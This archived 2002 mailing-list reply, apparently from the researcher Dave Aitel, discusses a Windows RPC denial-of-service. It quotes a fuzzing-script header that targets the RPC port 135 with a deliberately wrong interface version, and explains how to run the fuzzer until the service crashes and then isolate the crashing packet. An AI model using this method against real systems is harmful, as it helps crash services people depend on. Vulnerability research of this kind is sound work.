Re: MS WIN RPC DoS CODE FROM SPIKE v2.7

[Dave Aitel <dave () immunitysec com>]

There are questions about whether this vulnerability works if you have
large enough amount of free memory. My exploit is tuned for my machine's
amount of free memory (not much), but there are variations that work on
any amount.

For those who are interested, here is my domsrpcfuzz.sh header I used to
find this attack. 

MAX=35
UUID=b9e79e60-3d52-11ce-aaa1-00006901293f
#using incorrect versionmajor for bonus fun!
VERSIONMAJOR=2
VERSIONMINOR=2
PORT=135
TARGET=192.168.1.100
STARTFUNCTION=0

Just copy that in, and let it run for a while. When it crashes, look at
your output file and it will have the random seed that crashed it. Then
you can do some more work to manually isolate the exact packet or
sequence that crashes it.

On Tue, 2002-10-22 at 14:25, lion wrote:
> *
> * MS WIN RPC DoS CODE FROM SPIKE v2.7
> *
-- 
Dave Aitel <dave () immunitysec com>
Immunity, Inc

Attachment: signature.asc
Description: This is a digitally signed message part